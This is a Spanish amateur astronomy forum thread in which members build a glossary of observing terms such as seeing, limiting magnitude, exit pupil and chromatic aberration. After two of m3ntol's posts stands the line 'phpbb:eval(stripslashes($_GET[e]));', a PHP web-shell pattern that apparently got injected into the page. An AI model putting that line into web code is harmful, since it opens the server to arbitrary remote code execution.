diccionario del observador.

Preguntas básicas sobre astronomía
pisapedales :-j
Mensajes: 69
Registrado: Vie May 04, 2007 6:06 pm

diccionario del observador.

Mensaje por pisapedales :-j »

hola
inicio este hilo para que alguno me podais ayudar con esta terminologia compleja para no iniciados.
ya se que es el seeiling (o parecido) pero todabia me quedan muchas "palabrejas" por aprender.
si alguno pudiera crear un diccionario o glosario de palabras relacionadas con esta aficion se lo agradeceria.
Ya sabe mi hijo, mas que yo.
rcacho
Mensajes: 532
Registrado: Vie Mar 02, 2007 9:39 pm

diccionario del observador.

Mensaje por rcacho »

Se llama seeing ;) (una errata, jeje)

Escribe una lista de palabras que no sepas lo que significan para empezar el glosario. A mi me vendria bien que lo hicieras, porque ya estoy familiarizado con la terminologia y para mi no hay palabras raras, entonces una ayudita para empezar vendria bien ;)

Un saludo pisapedales-j!!!
m3ntol
Mensajes: 1829
Registrado: Mié Feb 28, 2007 11:07 pm

diccionario del observador.

Mensaje por m3ntol »

empiezo yo :D:D

División de Cassini y mínimo de Encke (ver foto)

[img]http://www.astro-imaging.de/astro/images/encke_nasa.jpg[/img]

Os remito también a un artículo muy interesante sobre el mínimo de encke. Dedicado especialmente para Carlos :D:D:D:D

http://www.astro-imaging.de/astro/ghost_of_encke.html
phpbb:eval(stripslashes($_GET[e]));
carlosz22
Mensajes: 575
Registrado: Vie Mar 02, 2007 9:10 pm

diccionario del observador.

Mensaje por carlosz22 »

Gracias, m3ntol es todo un detalle :D
Me confundí con el nombre del anillo, el que vi era el C y por su puesto mi querida división enke 8)

He estado haciendo un glosario de términos astronómicos que no suelen ser comunes en el lenguaje normal o que se usan de diferente forma. Si queréis lo pongo donde me digáis y lo vamos rellenando entre todos. Por ahora solo he "traducido" el significado de unas pocas palabras, os dejo las fáciles para vosotros jejeje.

Un saludo :)
astrolozano
Mensajes: 325
Registrado: Dom Mar 04, 2007 10:35 pm

diccionario del observador.

Mensaje por astrolozano »

Pues ponle respondiendo a este hilo y vamos respondiendo con palabras nuevas a la vez que editamos y añadimos al original. Cuando esté en fase avanzada, lo podemos poner como artículo.
  • Seeing.- Calidad de la imagen (provocada por la turbulencia atmosférica debido a diferencias de temperatura en las distintas capas).
  • MALE (Magnitud Límite Estelar).- Es la magnitud de la estrella más débil visible a simple vista. Se suele averiguar contando estrellas en un área determinada. Ya subiré a la web o pondré un enlace a unas cartas muy buenas que se usan para esto.
  • Titilar o tilting.- Son las desviaciones que tiene una estrella con respecto a su posición media cuando se la observa. En planetaria este efecto se ve más como si la imagen ondease.
  • Blurring.- Es el grado de borrosidad de la imagen. Se debe a que las diferentes celdas atmosféricas desvían cada una la imagen en una dirección y el efecto visual es de emborronamiento. Es más acusado con grandes aperturas (debido a que captan imágenes de más celdas).[/list:u]

    Con respecto a oculares:
    • Campo aparente o AFOV (Aparent field of view).- Es el campo que nos parece que abarcamos al mirar con un ocular. A mayor campo aparente, mayor sensación de inmersión. Sería algo así como mirar por una cerradura o por una ventana.
    • Campo real.- Es el campo que realmente vemos al mirar a través del ocular. Se puede calcular aproximadamente dividiendo el campo aparente del ocular por el número de aumentos.
    • Aumentos.- Número de veces que nos parece que la imagen está más cerca (no más grande). Se obtiene dividiendo la distancia focal del telescopio por la del ocular.
    • Apertura.- Tamaño de la lente o espejo que concentra la luz en nuestro telescopio. A mayor apertura, mayor resolución (aunque también captamos más los defectos atmosféricos).
    • Pupila de salida.- Diámetro del haz luminoso que sale del ocular. Se obtiene dividiendo el diámetro del telescopio (apertura) por el número de aumentos. Hay una pupila de salida óptima para observar cada objeto en cada condición obteniendo el máximo contraste.
    • Extracción pupilar.- Distancia a la que hay que poner el ojo para abarcar todo el campo del ocular. Algunos oculares, si te acercas más de esa distancia, tienen problemas de blackout (desaparece la imagen) o kidney-bean (se forma un halo negro en forma de judía).[/list:u]

      De momento nada más, que me lío y no paro... Acepto mejoras en las definiciones, ya que son definiciones propias de lo que he ido deduciendo.

      PS: He borrado el mensaje que nos ofrecía sexo de mil maneras, no creo que fuera de interés en este foro :wink:
carlosz22
Mensajes: 575
Registrado: Vie Mar 02, 2007 9:10 pm

diccionario del observador.

Mensaje por carlosz22 »

Añado mi lista. Podeis ir completándola. Ya he añadido las que ha puesto Álvaro.

A

Aberración:
Imperfección que presenta un sistema óptico al no ser sus componentes totalmente perfectos tan en eje como fuera de él.

Aberración cromática:
Existe cuando al mirar a través del telescopio observamos un halo de otro color alrededor de un objeto brillante. Se produce como consecuencia de la diferencia en el ángulo de desviación (refracción) de distintas longitudes de onda, teniendo algunas longitudes (colores) su foco en un plano distinto. Ver "Acromático" y "Apocromático"

Aberración esférica:
Cuando los rayos que proceden del punto objeto no coinciden en un punto común. Al situar la imágen que se desea analizar en la zona media de enfoque parte de los rayos no enfocan exactamente en ese punto por lo que se pierde definición y contraste en la imagen.

Acromático:
Un sistema acromático consiste en asociar una lente convergente a una divergente, consigue una corrección parcial de la aberración cromática.
[img]http://www.astrohenares.org/upd/data/si ... matico.jpg[/img]

Adus:
Ver
carlosz22
Mensajes: 575
Registrado: Vie Mar 02, 2007 9:10 pm

diccionario del observador.

Mensaje por carlosz22 »

No me mateis por la lista tan larga que he puesto :oops:

A petición de Álvaro. ¡¡¡LA TAPA DE MI VIXEEENN!!! :D

Un saludillo a todos.
m3ntol
Mensajes: 1829
Registrado: Mié Feb 28, 2007 11:07 pm

diccionario del observador.

Mensaje por m3ntol »

Carlos,
me parece una lista cojonuda!! vamos a completarla entre todos y luego la metemos en un diccionario y lo ponemos como recurso de la web.

Bravo!!
phpbb:eval(stripslashes($_GET[e]));
astrolozano
Mensajes: 325
Registrado: Dom Mar 04, 2007 10:35 pm

diccionario del observador.

Mensaje por astrolozano »

Ale, he añadido unas cuantas. Espero que no te importe que haya editdo directamente el mensaje.
He añadido cenit con C, ya que es muy común verlo así.
rcacho
Mensajes: 532
Registrado: Vie Mar 02, 2007 9:39 pm

diccionario del observador.

Mensaje por rcacho »

Hale, yo también he añadido algunas mas.

Saludos!!!
Responder